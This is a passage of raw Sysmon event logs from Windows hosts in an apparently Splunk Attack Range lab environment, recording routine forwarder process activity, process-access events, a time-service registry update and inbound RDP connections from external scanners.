Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000064974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:58.775{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57497-false10.0.1.12-8089- 354300x800000000000000064973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:58.714{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11291-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.627{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=020589FE73524313F434471487FDDC94,SHA256=6081DEFBDDB805FA274F97A2B38D63883EA55FF1F38A43224AB07EEAE75FF6DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000064971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.439{A7A01FEF-EB44-607E-780B-00000000BB01}38962972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB44-607E-780B-00000000BB01}3896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB44-607E-780B-00000000BB01}3896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000064964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.283{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB44-607E-780B-00000000BB01}3896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000064963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.284{A7A01FEF-EB44-607E-780B-00000000BB01}3896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000064962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.220{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A8EFBFCA84F0785556E077BB6F956D6,SHA256=C326F227DD64D4D71345432A00593A11ED6734B54B216AFFA3D0A5CE3C2FB60A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000064961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:00.080{A7A01FEF-B626-607E-1100-00000000BB01}1176C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d735f5-0x22fa4090) 354300x800000000000000049692Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.841{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52493-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000049691Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB44-607E-DA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049690Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049689Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049688Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049687Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049686Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049685Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049684Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049683Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049682Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049681Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB44-607E-DA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049680Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB44-607E-DA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049679Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.155{85C0FFC9-EB44-607E-DA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049678Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.108{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2016058BE2AFCB5A87177B5BBE394EF,SHA256=5AC77B66010DAA0B3F23A9C894502BAE3ACE31C584BC6E48160A75712992DC6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.268{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12656-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.118{A7A01FEF-B626-607E-1100-00000000BB01}1176C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-339.attackrange.local123ntpfalse169.254.169.123-123ntp 354300x800000000000000064986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.513{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64943-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:01.658{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A097394F9E1851E439A32D83D9C1700,SHA256=97677715ADE61335D2A525871CD20C4BBD48F1BC3DBED68E1AA6258CCE5BF90B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:01.299{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C717D1860887016027C8FDFDAB7F71D1,SHA256=57E0DEB1F2F01EE981E380E7931F66CDF4C75614D8DCAE8239AD89A4486A8B0E,IMPHASH=00000000000000000000000000000000falsetrue 